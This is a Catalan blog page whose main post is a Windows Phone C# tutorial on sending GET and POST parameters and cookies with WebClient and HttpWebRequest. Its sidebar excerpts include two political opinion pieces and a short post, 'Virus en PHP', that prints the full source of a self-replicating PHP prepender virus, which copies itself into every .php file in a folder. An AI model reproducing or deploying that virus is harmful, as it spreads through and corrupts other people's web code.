Ves al contingut principal

Passant POST i GET paràmetres en windows phone

Un dels problemes principals quan accedim a urls és passar paràmetres amb GET i POST. No és molt complicat, però pots tirar-te uns quants dies buscant informació si tens la mala sort que tinc jo ;).
Primer ja hem treballat amb GET, és la forma "normal" amb que hem treballat en anteriors posts, simplement amb un webclient i  esperar l'arxiu de manera asíncrona, per a passar par1, par2... per get els afegirem a la url que obrim:


            WebClient wc = new WebClient();
            wc.DownloadStringCompleted += HttpCompleted; //funció que es cridarà quan es connecte l'event
            wc.DownloadStringAsync(new Uri("http://url?par1=valor1&par2=valor2"));



 private void HttpCompleted(object sender, DownloadStringCompletedEventArgs e)
        {

            if (e.Error == null)
            {
                  //en e.Result tindrem l'arxiu com a cadena de text
             }
       }



El problema és que si volem fer-ho per POST o si volem afegir cookies ho haurem de fer d'una altra manera, ho haurem de fer amb webrequest, i necessitarem capturar dos "events", l'inici de la descàrrega i inici de l'stream de dades dades POST, i veurem un allDone que del que parlarem després: 

            HttpWebRequest request = (HttpWebRequest)WebRequest.Create(sTuentiURLLogin);
            request.ContentType = "application/x-www-form-urlencoded";
            request.Method = "POST";
            request.BeginGetRequestStream(new AsyncCallback(BGRS), request);


 private static void BGRS(IAsyncResult asynchronousResult)
         {
             HttpWebRequest request = (HttpWebRequest)asynchronousResult.AsyncState;

            //Final de l'stream de dades post:
             Stream postStream = request.EndGetRequestStream(asynchronousResult); 

            //que volem enviar:
             string postData = "par1=valor1&par2=valor2";
             byte[] byteArray = Encoding.UTF8.GetBytes(postData);
             postStream.Write(byteArray, 0, postData.Length);
             postStream.Close();

            //esperem la resposta asíncronament:
             request.BeginGetResponse(new AsyncCallback(BGR), request);
             allDone.WaitOne();

         }

 private static void BGR(IAsyncResult asynchronousResult)
        {
             HttpWebRequest request = (HttpWebRequest)asynchronousResult.AsyncState;
             HttpWebResponse response = (HttpWebResponse)request.EndGetResponse(asynchronousResult);
             Stream streamResponse = response.GetResponseStream();
             StreamReader streamRead = new StreamReader(streamResponse);           

              //en responseeString tindrem el Resultat final
              string responseString = streamRead.ReadToEnd();
      }


Sí voleu saber com funciona internament, simplement llegiu un poc els comentaris que he posat, tampoc té molta dificutat, el mètode BGRS, envia el POST asíncronament, i l'arreplega asíncronament el mètode BGR. Per últim ens faltaria afeir un:

 Private static ManualResetEvent allDone = new ManualResetEvent(false);

per a fer el allDone.WaitOne(), el que fa el mètode és esperar (bloquejar-se) fins que aplega un senyal (descàrrega).

Si vulguerem enviar cookies, seria molt senzill amb un element:

   static private CookieContainer CC = new CookieContainer(); 

en la primera petició, afegirem el codi:

request.CookieContainer = CC;

I així podrem arreplegar les cookies de tornada, si el que vulguerem és enviarla:
Cookie cook = new Cookie("email", "fercavi666@gmail.com", "/", ".gmail.com");
CC.Add(new Uri("http://www.google.com"),cook);

siguent: email la "clau", "fercavi666@gmail.com", el valor, "/" la ruta i ".gmail.com" el domini.

Comentaris

Entrades populars d'aquest blog

Parlem de Bloc i País?

Comence una nova etapa en el tema polític, de fet ja fa temps que la vaig començar, però ara ho fet involucrant-me activament als assumptes interns del meu partit. Em defineix a mi mateix com una persona activa (de vegades inclús hiperactiva), amb inquietuds i preocupacions, en definitiva, em mou les ganes de ser útil a la meua gent i l’estima pel meu país. Aquestes voluntats però, no les he vistes, o almenys, ja no les veig tan a sovint en el tarannà del meu partit. No negaré que, potser, tinc desavinences en l’actual línia de la direcció (allò que s’ha anomenat com el “aparato”), però la casuística dels últims viratges polítics no han deixat lloc a altra possibilitat. No vaig a repetir totes les actuacions que adés i ara van demostrar que els abanderats de la nova política no es comportaren com a tal. Tots sabem quines són. Però d'una si que en parlaré, una que per a mi fou bastant reiterativa i té molta relació en un dels principis de Goebbels, que és el de fer creure que la di…

Què poden(m) fer els polítics nacionalistes valencians?

Davant del procés que s'ha encetat a Catalunya, el primer que m'agradaria és mostrar el meu suport. Pot ser s'hagen fet errors, com en tot en esta vida. Ara bé, votar no pot ser mai antidemocràtic, i per tant el seu destí els decidiran ells. 
Alguns hem observat, sempre amb il·lusió, que pot ser després d'ells anem nosaltres, els valencians. Però la realitat és tossuda. Mai hem tingut un sentiment nacionalista similar als catalans. I, possiblement, mentre no fem alguna cosa per canviar-ho, no el tindrem. Per exemple, podem veure l'evolució  segons el CIS del sentiment nacionalista/independentista valencià i català:

Durant els primers anys (94 i 97) es codificava del 0 al 10, però al 2005, preguntaren allò de "sólo español" (que ho he codificat com un 2), "más español que (gentilicio)" (que será un 4),  "igual español que (gentilicio)" (que serà un 6),  "más (gentilicio) que español" (que serà un 8) i "sólamente (gentilicio…

Virus en PHP

Acabe de trobar un exemple simple de virus en PHP, m'he quedat flipat de la sensillesa, és clavat als virus.bat de MS-DOS:
1. Busca tots els .php de la carpeta
2. Si no està infectat:
  2.1 Escriu el contingut de la part del virus (anomenada prepender, 391 bytes) a l'inicio de l'arxiu
  2.2 busca el següent arxiu i ves al punt dos


Pareix simple i el codi la veritat és que ho demostra:

- - - - - - - - - - - - - [ PHP Prepender Virus Example ] - - - - - - - - - - - - - <?php // SPTH $string=fread(fopen(__FILE__,'r'), 391); $curdir=opendir('.'); while ($file = readdir($curdir)) { if (strstr($file, '.php')) { $victim=fopen($file, 'r+'); if (!strstr(fread($victim, 13), 'SPTH')) { rewind($victim); fwrite($victim, $string.fread($victim, filesize($file));); } fclose($victim); } } closedir($curdir); ?>